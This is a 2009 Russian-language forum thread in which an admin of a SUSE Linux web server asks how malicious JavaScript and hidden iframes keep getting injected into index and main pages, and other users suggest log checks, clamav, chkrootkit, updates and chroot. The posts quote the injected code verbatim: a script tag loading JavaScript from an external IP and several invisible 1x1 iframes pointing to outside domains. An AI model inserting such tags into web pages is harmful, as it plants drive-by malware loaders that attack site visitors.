Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Общий по Linux (http://forum.oszone.net/forumdisplay.php?f=9)
-   -   Вирусня под Suse (http://forum.oszone.net/showthread.php?t=142055)

Surround 06-06-2009 21:14 1136926
Вирусня под Suse
 
Стоит инет-сервак под Suse Linux Enterprice с апачем, как водится. Так вот, повелась там какая-то зараза вредная. Пишет свой ява-код вида
Цитата:
<script language="JavaScript" src="http://195.189.227.58/top100_00.js"></script>
и прочее, вплоть до процедур на ява-скрипте в вайлы сайтов, лежащих в /srv/www, причем разборчиво: только в страницы с содержанием в имени слов main или index.
что это может быть, куда копать?
На сервере еще есть папка для фтп-закачек, там полно, конечно, вирусни, но она виндовая :)

Envel 08-06-2009 09:36 1138008
Смотрите логи апача, кто там с этого адреса к вам лазает. Самое простое - заблокировать его.
Ну, а по большому счету нужно проверять ваш код и права доступа к содержимому. Заодно и ftp проверьте, не дает ли он легкий доступ к содержимому вашего www.

Surround 13-07-2009 18:49 1166621
извиняюсь за долгое пропадание :)
вот проблема снова проявилась, и есть чего показать.
Цитата:
<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://klinoneshoes.info" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://165.194.30.123/qwerty/1/index.php" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://bananm.net" width=0 height=0 frameborder=0></iframe>
выглядит оно примерно таким образом (я имею в виду зараза). Провелир логи - нет запросов с этих адресов.
Самое занятное, что писать в этот файл (index.php, в нем было найдено) может только root. Пароль не элементарный, менял.

seman 14-07-2009 17:21 1167511
Surround
а обновленным clamav не пробЫвали просканить весь /

[mzd] 14-07-2009 17:43 1167535
Попробуйте задать вопрос в разделе Информационная безопасность. Если не помогут, то рекомендую обратиться на форум разработчиков антивирусных программ, например, Dr. Web или Касперского. У них больше опыта :)

lxa85 14-07-2009 18:00 1167554
Surround, какая версия Апача? Быть может он подвергается атаке и повышает свои права до уровня системы? Хотя не должен. Надо подумать, как это происходит, но ответ пока прежний - установить акутальные обновления.

mar 14-07-2009 18:54 1167601
ну проблема не в вирусе - тут никаких следов пребывания нет, а во взломе Вашего сервера. Надо очень внимательно проверять измененнные файлы (и по времени, и по размеру). И все возможные логи.
Что значит в index.php может писать только root?? Вы пускаете его по ftp? Или редактируете файлы только по ssh?

Surround 18-07-2009 00:53 1171066
Цитата:
Цитата mar
Что значит в index.php может писать только root?? »
в том плане, что chmod стоит 755.
попробую посканить

sergleo 21-07-2009 09:50 1173375
Проверьте с помощью http://www.chkrootkit.org/,

Интересно, вы пускаете свой веб сервер под рутом? или под системным юзером www? Используйте для веб сервера chroot.

Kent 21-07-2009 11:05 1173455
Установи пакет seccheck.


Время: 02:40.

Время: 02:40.
© OSzone.net 2001-